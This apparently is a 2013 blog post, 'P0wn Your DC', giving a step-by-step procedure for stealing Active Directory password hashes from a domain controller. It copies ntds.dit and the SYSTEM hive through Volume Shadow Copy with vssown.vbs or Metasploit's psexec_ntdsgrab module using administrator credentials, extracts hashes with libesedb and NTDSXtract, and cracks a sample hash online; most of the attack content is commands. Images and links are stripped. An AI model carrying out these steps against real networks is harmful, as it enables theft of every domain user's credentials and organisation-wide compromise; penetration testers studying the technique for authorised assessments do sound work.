Monday, May 27, 2013

P0wn Your DC


Without a doubt, Active Directory offers a number of advantages for maintaining your environment.  In addition to offering administrators centralized management, it offers bad guys a potential pot of gold - user hashes!  This information is stored in a database called NTDS.NIT.  Unfortunately or fortunately depending on your perspective, this file is locked on running domain controllers, so you can't simply copy this file.  Leveraging Volume Shadow Copy Service (VSS), we can use Microsoft's own technology to gather these valuable user hashes!  I will show you two methods for extracting the necessary files along with extracting and cracking the hashes.  This post is for educational purposes ONLY.  Never attempt this on a network you don't own and/or have strict permission!

Capturing The Hash


This method uses a vbs script to create a backup of the Domain Controller (DC) where the critical files can be extracted.

  1. Download the source code for the script from here:
  2. Execute the script using the following commands:
    • cscript vssown.vbs /create
    • cscript vssown.vbs /list - Make note of the Device object
    • NewImage
    • copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit
    • copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\system32\config\system
  3. Copy these two files to your pentesting machine - Kali Linux

Metasploit -  Psexec_ntdsgrab

This method utilizes Metasploit which automates the process of creating the snapshot and copying the files to the attack machine.  
  1. Open an Metasploit shell and enter the following commands
    • > use auxillary/admin/smb/psexec_ntdsgrab
    • > set RHOST
    • > set SMBPass <p@ssw0rd>
    • > set SMBUser administrator
    • > set CREATE_NEW_VSC true - if error of Shadow copy not found
    • > run
    • NewImage4 
  2. The following files should be located in ~/.msf4/loot
    • NewImage
  3. Copy these two files (.dit & .bin) to your penetration testing machine.

Extracting The Hash

You will need two tools to extract the hashes from your captured AD files.  The first is Libesedb which allows you to read and extract the tables from the ntds.dit database file.  The second is NTDSXtract which allows you to extract the hashes from the data tables.  You will need to download the source files and compile Libesedb.


  1. Download and compile libesedb
  2. Using the correct path, run  esedbexport against the .dit file capture above.
  3. NewImage



  1. Download NTDSXtract
    • wget
    • gunzip
    • cd /root/.msf4/loot/ntds.export (This is the location of the above process)
    • python /root/downloads/NTDSXtract\dsusers-py ./datatable.3 ./link_table.5 --passwordhashes /root/.msf4/loot/ntds.bin
      • Note - the ntds.bin file location is from the hash capturing process in the beginning of this article
    • The results will provide a list of users and the associated hashes:
    • NewImage


Cracking The Hash

  1. Now that you have the password hash for the interested user account, you can use a number of tools to potential crack the password.  I will use an online service in my example.  I will create another blog post for integrating this with tools such as John the Ripper.
  2. Go to:
  3. Copy the hash into the website.  If a matching hash is found, you will be shown the related password.
    • de26cce0356891a4a020e7c4957afc72
    • NewImage



There are a number of factors that can influence the success of this attack. Most notably, the complexity of the password may not be referenced in the password list used to reference the hash.  WIthout that, you will not be able to see the password.  Password lists and rainbow tables are beyond the scope of this article, but if these are foreign concepts, it would be worth your while to do a bit of research on the topic.  Below are some of the links I used to create this post:

No comments:

Post a Comment